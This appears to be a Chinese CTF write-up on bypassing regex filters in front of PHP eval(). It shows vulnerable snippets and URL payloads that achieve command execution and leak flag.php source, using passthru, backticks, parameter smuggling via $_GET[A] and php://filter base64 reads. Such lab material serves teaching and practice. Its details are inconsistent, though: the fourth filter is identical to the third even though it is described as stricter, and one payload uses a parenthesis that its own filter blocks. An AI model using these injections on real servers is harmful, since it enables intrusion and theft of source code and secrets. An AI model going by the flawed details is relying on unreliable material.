目录
被过滤了flag怎么办
方法
结果
过滤了flag、php、system
方法一
结果
编辑
方法二
过滤了很多但是主要的就是过滤了空格 和' 注意一下这个就行
方法一
方法二
相对于上面一道题来说多过滤了一个括号
方法一
被过滤了flag怎么办
<?php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
方法
?c=system('cat fla*');
结果
过滤了flag、php、system
<?php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
方法一
?c=echo%20`cat%20fla*`;
结果
方法二
?c=passthru('cat fla*');
过滤了很多但是主要的就是过滤了空格 和' 注意一下这个就行
<?php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
方法一
http://192.168.244.152:8080/web.php?c=passthru($_GET[A]);&A=cat%20flag.php
方法二
http://192.168.244.152:8080/web.php?c=include$_GET[A]?%3E&A=php://filter/read=convert.base64-encode/resource=flag.php
相对于上面一道题来说多过滤了一个括号
<?php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
方法一
http://192.168.244.152:8080/web.php?c=include$_GET[A]?%3E&A=php://filter/read=convert.base64-encode/resource=flag.php